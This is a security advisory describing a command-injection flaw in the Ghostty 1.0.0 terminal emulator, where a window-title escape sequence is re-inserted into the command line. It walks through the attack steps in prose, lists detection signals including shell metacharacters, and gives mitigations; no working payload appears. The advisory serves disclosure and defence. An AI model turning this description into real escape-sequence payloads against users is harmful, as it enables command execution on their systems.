Source: security-advisories@github.com
Ghostty is a cross-platform terminal emulator. Ghostty, as allowed by default in 1.0.0, allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands. This attack requires an attacker to send malicious escape sequences followed by convincing the user to physically press the "enter" key. Fixed in Ghostty v1.0.1.
Ghostty, a cross-platform terminal emulator, is vulnerable to a command injection attack. An attacker can manipulate the window title using escape sequences, and then inject malicious commands into the user's terminal when the user interacts with a file containing the crafted sequence, potentially leading to arbitrary code execution and system compromise. This vulnerability requires user interaction, specifically pressing the 'enter' key after the malicious sequence is displayed.
Step 1: Payload Creation: The attacker crafts a malicious escape sequence that modifies the window title. This sequence includes shell commands designed to execute arbitrary code when the user presses enter.
Step 2: Payload Delivery: The attacker convinces the user to view a file (e.g., a text file, a log file, or a file opened in a text editor) that contains the crafted escape sequence. This could be achieved through social engineering, phishing, or by hosting the malicious file on a shared resource.
Step 3: Window Title Modification: When the user views the malicious file, the escape sequence is processed by Ghostty, and the window title is changed to the attacker-controlled string.
Step 4: Command Injection: The attacker relies on the title being re-inserted into the command line, and then convinces the user to press the 'enter' key. This triggers the execution of the malicious commands embedded within the window title.
Step 5: Code Execution: The injected commands are executed with the user's privileges, potentially allowing the attacker to gain control of the system.
The vulnerability stems from insufficient sanitization of user-controlled input used for the window title. Ghostty, in version 1.0.0, fails to properly filter or escape escape sequences used to modify the window title. This allows an attacker to embed malicious commands within these sequences. When a user views a file containing these sequences, the terminal emulator processes them, sets the window title, and then, due to a flaw in how the title is later used, allows the attacker-controlled title to be re-inserted into the command line. The core issue is a lack of input validation and output encoding, specifically failing to prevent the injection of shell metacharacters within the window title. The vulnerability is triggered when the user presses enter after the malicious title has been set.
While no specific APTs are directly linked to this vulnerability at this time, the nature of command injection makes it attractive to a wide range of attackers. This vulnerability could be leveraged by attackers to establish persistence, escalate privileges, or exfiltrate data. Not currently listed on CISA KEV.
Monitor terminal emulator logs for unusual window title changes, especially those containing shell metacharacters (e.g., ;, &, |, $, `).
Analyze network traffic for suspicious outbound connections originating from the user's terminal after viewing files.
Implement file integrity monitoring to detect changes to critical system files that could be caused by the execution of malicious commands.
Monitor for the creation of new user accounts or the modification of existing ones.
Examine process creation logs for unusual processes spawned by the terminal emulator or related processes.
Upgrade to Ghostty v1.0.1 or later.
Implement robust input validation and output encoding to sanitize user-supplied data used for the window title. Specifically, escape or filter shell metacharacters.
Review and harden the configuration of the terminal emulator to restrict its functionality and reduce the attack surface.
Educate users about the risks of opening untrusted files and the importance of exercising caution when interacting with terminal emulators.
Implement a security awareness program to educate users about phishing and social engineering tactics.